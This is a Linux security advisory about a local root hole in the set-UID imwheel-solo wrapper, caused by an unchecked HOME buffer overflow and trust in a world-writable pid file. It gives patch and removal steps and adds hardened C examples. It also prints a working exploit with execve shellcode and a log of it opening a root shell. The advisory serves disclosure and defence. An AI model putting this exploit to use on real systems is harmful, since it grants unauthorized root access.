COMMAND
imwheel
SYSTEMS AFFECTED
Any system which has imwheel-solo wrapper-script installed as set-UID root
PROBLEM
The following is based on a TESO Security Advisory. A vulnerability
in the imwheel application for Linux has been discovered. Some
distribution packages of imwheel ship with a set-UID-root
wrapper script that invokes the insecure program 'imwheel' with
UID 0.
Among the vulnerable distributions (if the package is installed)
is Halloween Linux Version 4 (imwheel package from the
powertools/contrib CD).
Tests:
[stealth@liane stealth]$ id
uid=500(stealth) gid=500(stealth) groups=500(stealth)
[stealth@liane stealth]$ cd imhack/
[stealth@liane imhack]$ stat `which imwheel-solo`
File: "/usr/X11R6/bin/imwheel-solo"
Size: 795 Filetype: Regular File
Mode: (4755/-rwsr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Device: 3,1 Inode: 214472 Links: 1
Access: Mon Mar 13 17:32:22 2000(00000.00:04:38)
Modify: Mon Nov 1 23:41:15 1999(00132.17:55:45)
Change: Sun Mar 12 17:49:43 2000(00000.23:47:17)
[stealth@liane imhack]$ cc imexp.c
[stealth@liane imhack]$ ./a.out
Creating boom-shell...
Creating shellcode...
You can also add an offset to the commandline.
Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer
Respect other users privacy!
Invoking vulnerable program (imwheel-solo)...
imwheel is not running as a daemon.
imwheel is not checking/writing a pid file, BE CAREFUL!
An imwheel may be running already, two or more imwheel processes
on the same X display, or using gpm -W, will not operate as expected!
imwheel started (pid=1385)
Knocking on heavens door...
sh-2.03# id
uid=0(root) gid=500(stealth) groups=500(stealth)
sh-2.03#
An attacker may gain local root access on a system where the
vulnerable imwheel package is installed. Even where a root shell
cannot be obtained (e.g. because of a non-executable stack patch),
the attacker can still use the set-UID-root Perl script to kill
arbitrary processes.
The set-UID-root Perl script 'imwheel-solo' invokes the 'imwheel'
program with EUID 0. Because of inadequate bounds checking, an
internal stack-located buffer can be overflowed by an attacker:
'imwheel' does not bounds-check the string it takes from the HOME
environment variable. In addition, the wrapper script, which runs
privileged, can be fooled into sending SIGTERM to arbitrary
processes, killing them, because imwheel-solo blindly trusts any
PID found in a world-writable pid file.
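To make the two bug classes concrete, here is an added illustration in C, written for this page and not taken from imwheel or from the TESO advisory: an unbounded copy of $HOME into a fixed stack buffer next to a bounded version that rejects oversized input, and a pid-file reader that refuses files not owned by the invoking user or writable by others. The buffer size, the '/.imwheelrc' file name, the demo helpers and the temp-file pid value are assumptions chosen for the example; imwheel's real code differs.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define RCPATH_MAX 256       /* assumed size of the fixed stack buffer */
#define RCFILE "/.imwheelrc" /* assumed file name, not taken from imwheel */

/* Vulnerable pattern, kept for contrast only (never call it on untrusted input):
 * $HOME lands in a fixed stack buffer unchecked, so ~2000 bytes overwrite the saved return address. */
void build_rcpath_unsafe(const char *home, char out[RCPATH_MAX])
{
    strcpy(out, home);
    strcat(out, RCFILE);
}

/* Hardened: bounded formatting; an oversized or relative HOME is refused
 * instead of silently truncated. Returns the path length, or -1. */
static int build_rcpath(const char *home, char *out, size_t outsz)
{
    int n;
    if (home == NULL || home[0] != '/')
        return -1;
    n = snprintf(out, outsz, "%s" RCFILE, home);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

/* A privileged wrapper must not trust a PID from a file other users can write:
 * accept only a regular file owned by the invoking user and not group/world
 * writable. fstat() on the open descriptor ties the checks to the inode read. */
static long read_pid_checked(const char *path, uid_t owner)
{
    struct stat st;
    char buf[32], *end;
    ssize_t n; long pid;
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != owner ||
        (st.st_mode & (S_IWGRP | S_IWOTH)) != 0) {
        close(fd);
        return -1;
    }
    n = read(fd, buf, sizeof buf - 1);
    close(fd);
    if (n <= 0)
        return -1;
    buf[n] = '\0';
    errno = 0;
    pid = strtol(buf, &end, 10);
    if (errno != 0 || end == buf || (*end != '\0' && *end != '\n') || pid <= 1)
        return -1;               /* garbage, empty, or a PID no wrapper should signal */
    return pid;
}

/* Demo helpers on constructed input, so the checks run without imwheel. */
static int demo_rcpath(const char *home)
{
    char out[64];            /* deliberately small to keep the demo short */
    return build_rcpath(home, out, sizeof out);
}

static int demo_rcpath_oversized(size_t len)   /* HOME of len bytes: "/AAA..." */
{
    char *home = malloc(len + 1);
    int r = -2;
    if (home != NULL) {
        memset(home, 'A', len); home[0] = '/'; home[len] = '\0';
        r = demo_rcpath(home);
        free(home);
    }
    return r;
}

/* Writes the constructed value "1234" to a temp file owned by this user, mode 0600 or 0666. */
static long demo_pidfile(int world_writable)
{
    char path[] = "/tmp/imwheel-demo-XXXXXX";
    int fd = mkstemp(path), ok;
    long pid;
    if (fd < 0)
        return -2;
    ok = write(fd, "1234\n", 5) == 5 && fchmod(fd, world_writable ? 0666 : 0600) == 0;
    close(fd);
    pid = ok ? read_pid_checked(path, getuid()) : -2;
    unlink(path);
    return pid;
}

int main(void)
{
    printf("rcpath=%d oversized=%d pidfile 0600=%ld 0666=%ld\n", demo_rcpath("/home/stealth"),
           demo_rcpath_oversized(2070), demo_pidfile(0), demo_pidfile(1));
    return 0;
}
```

Even with these checks, a wrapper that runs with EUID 0 should drop to the real UID (setuid(getuid()) clears real, effective and saved UID when the caller is root) before calling kill(), so the kernel's own permission check refuses SIGTERM to processes the invoking user does not own, whatever the pid file says.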
The bug discovery and the demonstration programs are due to S.
Krahmer; the shellcode is due to Stealth. The exploit can be found
at:
http://www.cs.uni-potsdam.de/homepages/students/linuxer/
http://teso.scene.at or https://teso.scene.at/
Janusz Niewiadomski posted his version of the exploit:
/*
 * imwheel local root exploit [ RHSA-2000:016-02 ]
 * funkysh 04/2000 funkysh@kris.top.pl
 *
 * Layout of the oversized HOME value: NOP sled, shellcode, then the
 * guessed stack address repeated so that it lands on the saved return
 * address of the overflowed function. Linux/x86 only (32-bit, executable stack).
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFER 2070
#define NOP 0x90
#define PATH "/usr/X11R6/bin/imwheel-solo"
/* execve("/bin/sh") followed by exit(); contains no NUL bytes */
char code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46"
"\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
/* current stack pointer; the target's stack sits near ours because the
 * environment is inherited across exec (i386 gcc: return value in %eax) */
unsigned long getesp(void) { __asm__("movl %esp,%eax"); }
int main(int argc, char *argv[])
{
    int i, offset = 0;
    char buf[BUFFER + 1];        /* +1 for the terminating NUL */
    long address;
    if(argc > 1) offset = atoi(argv[1]);   /* optional adjustment of the guessed address */
    address = getesp() + 1000 + offset;
    memset(buf,NOP,BUFFER);
    memcpy(buf+(BUFFER-300),code,strlen(code));
    /* bound keeps the last 4-byte write inside buf */
    for(i=(BUFFER-250); i + sizeof(address) <= BUFFER; i+=4)
        *(int *)&buf[i]=address;
    buf[BUFFER] = '\0';
    setenv("DISPLAY", "DUPA", 1);
    setenv("HOME", buf, 1);      /* the overflowing string */
    execl(PATH, PATH, (char *)NULL);
    perror("execl");             /* only reached if the wrapper could not be run */
    return 1;
}
SOLUTION
The Slackware package available from Linuxmafia.org is not
affected by this, as it does not ship the SUID wrapper (the
included binary is not set-UID either). This applies to version
0.9.6 of imwheel. A SUID wrapper should simply not be necessary
in the first place.
The standard imwheel 0.9.7 package does not have a wrapper.
However, during 'installation' it prompts whether or not to
install the binary SUID. An excerpt from the Makefile:
## Setting UID, this is best for non-root usage!
## This does not effect usage for root users. (duh!)
## This gives all users kill privileges for other imwheel processes.
Judging from that, if you set up imwheel to be started from the
users' xinit scripts and killed on logout, you get the same
functionality without SUID. To reiterate, SUID is just a quick
cop-out for a better setup; on a single-user desktop machine even
less than that needs to be done.
For Red Hat, apply the following updates with 'rpm -Fvh [filename]':
Red Hat Powertools 6.1:
intel: ftp://updates.redhat.com/powertools/6.1/i386/imwheel-0.9.8-1.i386.rpm
alpha: ftp://updates.redhat.com/powertools/6.1/alpha/imwheel-0.9.8-1.alpha.rpm
sparc: ftp://updates.redhat.com/powertools/6.1/sparc/imwheel-0.9.8-1.sparc.rpm
sources: ftp://updates.redhat.com/powertools/6.1/SRPMS/imwheel-0.9.8-1.src.rpm
Red Hat Powertools 6.2:
intel: ftp://updates.redhat.com/powertools/6.2/i386/imwheel-0.9.8-1.i386.rpm
alpha: ftp://updates.redhat.com/powertools/6.2/alpha/imwheel-0.9.8-1.alpha.rpm
sparc: ftp://updates.redhat.com/powertools/6.2/sparc/imwheel-0.9.8-1.sparc.rpm
sources: ftp://updates.redhat.com/powertools/6.2/SRPMS/imwheel-0.9.8-1.src.rpm
The updated Red Hat advisory says that because the core
functionality of imwheel has been incorporated into many existing
applications, removing imwheel will not incur a significant loss
of functionality. If the machine on which imwheel is installed is
not a single-user machine, they recommend removing imwheel. To
remove imwheel run:
rpm -e imwheel